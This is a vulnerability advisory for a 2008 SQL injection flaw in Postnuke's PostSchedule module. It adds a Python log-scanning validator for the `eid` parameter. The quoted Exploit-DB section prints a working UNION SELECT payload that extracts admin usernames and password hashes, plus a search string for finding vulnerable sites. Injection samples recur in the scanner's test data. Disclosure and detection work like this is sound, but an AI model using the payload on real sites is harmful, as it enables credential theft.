Vendor: PostSchedule
By: Kacper
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PostSchedule
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Postnuke Mod PostSchedule SQL Vuln

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
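
Since the record lists no patch, one way to apply the input validation above is an allowlist check on `eid` for PostSchedule requests, shown here scanning web access logs. This is an added example, not code from PostSchedule or the original advisory; it assumes `eid` is a numeric event id and combined-format log lines, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: eid is a numeric event id, so only 1-10 ASCII digits are accepted.
EID_RE = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_target(target):
    """Return a reason string for a bad PostSchedule request, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    modules = [m.lower() for m in query.get("module", [])]
    if "postschedule" not in modules:
        return None  # other modules are out of scope for this rule
    eids = query.get("eid", [])
    if len(eids) > 1:
        return "eid supplied more than once"
    if eids and not EID_RE.fullmatch(eids[0]):
        return "eid is not a plain integer"
    return None

def scan(lines):
    """Return (line_number, reason) for every log line that fails the check."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reason = check_target(match.group(1)) if match else None
        if reason:
            hits.append((number, reason))
    return hits

# Constructed sample log lines (documentation address, not real traffic).
LOG_FMT = '192.0.2.10 - - [25/Apr/2008:10:00:01 +0000] "GET /index.php?{} HTTP/1.1" 200 5120'
SAMPLE_LOG = [LOG_FMT.format(q) for q in (
    "module=PostSchedule&view=event&eid=12",                      # valid id
    "module=PostSchedule&view=event&eid=-1')+union+select+0,1",   # quote breakout
    "module=PostSchedule&view=event&eid=7%27%29",                 # same, URL-encoded
    "module=News&sid=-1",                                         # different module
    "module=PostSchedule&view=event&eid=3&eid=4",                 # repeated parameter
)]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

The same `check_target` rule can reject requests at a reverse proxy or front controller before they reach the module; it does not replace parameterized queries in the module itself.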

Exploit-DB raw data:

Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
There may be different tables, e.g. pn_users, nuke_users, etc.

Homepage: http://devilteam.pl/

# milw0rm.com [2008-04-25]